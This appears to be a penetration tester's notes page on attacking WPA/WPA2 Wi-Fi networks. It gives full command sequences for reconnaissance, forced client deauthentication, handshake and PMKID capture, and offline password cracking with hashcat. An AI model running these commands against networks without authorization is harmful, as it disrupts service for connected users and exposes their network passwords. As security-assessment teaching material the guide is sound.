Wireless
Tools
Aircrack - Main tool for recon and grabbing handshakes
Hcxdumptool - Main tool for obtaining PMKID and EAPOL M1M2M3 or EAPOL M1M2M3M4 auth
Hcxtools - Used to converting .cap, .pcap, and .pcapng files into a hashcat readable format.
Hashcat - For cracking hashes
Handshake/PMKID
Aircrack
Verify the interface wlan0 is up and ready
iwconfigPut interface into monitor mode
sudo airmon-ng start wlan0Start Scanning and performing recon, Taking note of: The channel #. This is needed if there is only one AP on the single channel. If there are multiple under different channel, this is not needed. The AUTH section. PSK(Pre-shared key) means we can obtain a handshake for offline cracking. MGT means it is configured for WPA-Enterprise The Stations below to see if any clients are connected to our target. This may not 100% show all connected clients.
sudo airodump-ng wlan0mon*For 5GHz networks
sudo airodump-ng wlan1mon -b a*For all networks (2.5GHz and 5GHz) - Note this can take longer as it sniffs multiple bands.
sudo airodump-ng wlan1mon -b abgFocus on Targe ESSID(s) and save to a file (be sure to add the band with -b if sniffing on on 5GHz or both)
sudo airodump-ng wlan0mon -c CH# --essid "SSID" -w outfileObtain handshake - either wait for someone to connet to the AP from their device OR force a deauth. Using a second terminal window/tab: To deauth anything from the network
sudo aireplay-ng -0 10 -a BSSID wlan0monIf we choose a client to deauth it will be the same but with the client MAC(station)
sudo aireplay-ng -0 10 -a BSSID -c STATION wlan0monWe can see if a Handshake obtained by checking the top right of our airodump screen
Once we have our handshake, we can stop airodump with ctrl+c.
HCXDumptool
This may depends on which version you have installed. Eg. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up to date (currently v.6.3.5)
This attack is not guaranteed!!. Not all access points(APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.
Legend
R = + AP display : AP is in TX range or under attack
1 = + AP display : got EAPOL M1 (CHALLENGE)
3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) - hashcat / JtR can work on
P = + AP display : got PMKID - hashcat / JtR can work on
S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK
E = + CLIENT display : got EAP-START MESSAGE
2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) - hashcat / JtR can work on
Scan for PMKID
Put interface into monitor mode
sudo airmon-ng start wlan0Find the BSSID of our target with some recon using airodump
sudo airodump-ng wlan0monOnce we have the BSSID, put it into a Berkeley Packet Filter (BPF) .bpf file.
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf** NOTE: We can attack multiple APs with:
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpfsudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan0mon -w outfile.pcapngAfter a while we may see the + under the 3 or P of our target. Both of which can be used to obain the password with hashcat. (Unable to get a PMKID in the demo environment sadly.)
When we see the + under the 3 or P of our target, stop hcxdumptool with ctrl+c
Crack it with hashcat
Convert the file to a hashcat format. The output will look the same regardless of which file extensiton it is.
.cap file converstion to Hashcat format.
sudo hcxpcapngtool -o SSIDHash outfile.cap.pcapng file conversion to hashcat format
sudo hcxpcapngtool -o SSIDHash outfile.pcapngUse hashcat with mode 22000 and a wordlist. Try different wordlists and rules.
sudo hashcat -m 22000 SSIDHash wordlistWe can also run the above command with --show to show the password.
sudo hashcat -m 22000 SSIDHash wordlist --showCaptive Portals
COMING SOON
Last updated